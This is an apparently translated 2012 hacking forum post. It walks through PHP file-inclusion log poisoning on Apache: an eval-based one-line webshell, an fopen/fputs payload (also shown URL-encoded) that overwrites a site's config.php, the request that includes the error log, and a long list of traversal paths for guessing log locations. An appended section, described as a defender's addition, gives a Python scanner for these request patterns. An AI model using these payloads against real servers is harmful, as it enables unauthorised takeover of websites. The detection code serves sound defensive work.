Writing a webshell via PHP inclusion of the Apache log

Posted 2012-9-15 14:27:40
Because the method above is very impractical (in testing I found the logs are routinely tens of megabytes, which makes that approach no fun), let's take it one step further: we write a real, practical webshell to use, which is far better than the painfully slow method above.

For example, still using this one-line shell:
<?eval($_POST[cmd]);?>

At this point you may already have thought of it: this is a very good approach. Read on; how to write it becomes the question. Use this statement:
use fopen to open the file /home/virtual/www.xxx.com/forum/config.php, then write the one-line shell server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   // write the one-line shell statement into config.php

We submit this statement, have Apache record it in the error log, then include the log, and the shell is written successfully. Remember it must be converted to URL-encoded form or it will not work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log records this line of code that writes the webshell.
Now we include the log again by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written successfully; the one-line shell statement is now in config.php.
OK.
http://www.xxx.com/forum/config.php has become our webshell.
Connect to it directly with lanker's client and the host is yours.

PS: The prerequisite for everything above is that the directory permissions must be writable; it has to be -rwxrwxrwx (777) to continue. Here we simply use the directory listed above to check. Everything above is exploitation in the case where the log path is known.

For other log paths, you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
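Added here from the defender's side, not part of the original post: a small Python scanner over constructed Apache log lines (sample data, not real traffic) that flags the two request shapes this post relies on, a request whose URL-decoded target contains a PHP open tag (code aimed at the log file) and an include request whose query parameter names a log file or uses traversal. The parameter name zizzy and the log paths are taken from the post; IPs, timestamps and the error-log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample log lines (not real traffic, not from the original post):
# an access-log entry whose target is URL-encoded PHP, an include request whose
# parameter names a log file, a benign request, and matching error-log lines
# (Apache writes the decoded path, which is why the error log gets poisoned).
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22x%22%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 209',
    '203.0.113.5 - - [15/Sep/2012:14:28:01 +0800] "GET /z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log HTTP/1.1" 200 4120',
    '198.51.100.7 - - [15/Sep/2012:14:29:13 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 8812',
]
SAMPLE_ERROR_LOG = [
    '[Sat Sep 15 14:27:40 2012] [error] [client 203.0.113.5] File does not exist: /home/virtual/www.xxx.com/htdocs/<?$fp=fopen("x","w+");?>',
    '[Sat Sep 15 14:30:00 2012] [error] [client 198.51.100.7] File does not exist: /home/virtual/www.xxx.com/htdocs/favicon.ico',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r'<\?')                         # any PHP open tag, short or long
LOG_PATH_RE = re.compile(r'\.\./|/var/log/|/logs/|(access|error)[_.]log', re.IGNORECASE)

def decode_target(target, rounds=2):
    """URL-decode up to `rounds` times so double encoding does not hide the tag."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify_access(line):
    """Findings for one combined-format access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = decode_target(m.group('target'))
    findings = []
    if PHP_TAG_RE.search(target):
        findings.append('php-tag-in-request')            # code aimed at the log file
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if any(LOG_PATH_RE.search(v) for v in values):
            findings.append('log-path-in-param:' + key)  # the include step
    return findings

def classify_error(line):
    """Findings for one Apache error-log line: PHP code in the logged message."""
    if PHP_TAG_RE.search(line.split('File does not exist: ', 1)[-1]):
        return ['php-tag-in-error-log']
    return []
```

Run over real logs, a hit on both classifiers from the same client within a short window is the sequence this post describes, and the error-log hit is the artefact that survives even if the access log rotates.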